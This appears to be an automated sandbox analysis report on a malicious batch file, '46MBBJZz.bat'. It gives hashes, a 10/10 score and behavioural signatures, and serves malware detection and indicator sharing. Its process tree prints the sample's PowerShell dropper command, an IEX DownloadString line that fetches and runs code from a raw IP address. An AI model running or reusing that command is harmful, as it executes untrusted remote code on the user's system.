Analysis
-
max time kernel
129s -
max time network
66s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
01-05-2020 13:10
Static task
static1
Behavioral task
behavioral1
Sample
46MBBJZz.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
46MBBJZz.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
46MBBJZz.bat
-
Size
189B
-
MD5
c7b71aa9749be55225b17bbaf4b4b9a1
-
SHA1
ec46d8385341aa2152b70d834c898c5fd9c82284
-
SHA256
ca27de823967366e96e0623a33820b1713b1e19439c82d81fe6521e04da48dcb
-
SHA512
3c0c57b1384957bcf30d3c079c6fc7c4a48be99a2148490e078eaa1809dd87d2e5f047f457cc8c9f2e6518f5ef8177d73f739c27076f45ec5deae04be4590e8d
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/46MBBJZz
Signatures
-
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 4 http://www.msftconnecttest.com/connecttest.txt -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2172 1804 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2172 WerFault.exe Token: SeBackupPrivilege 2172 WerFault.exe Token: SeDebugPrivilege 2172 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe 2172 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\46MBBJZz.bat"1⤵PID:1492
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/46MBBJZz');Invoke-ECMOWU;Start-Sleep -s 10000"2⤵PID:1804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1804 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2172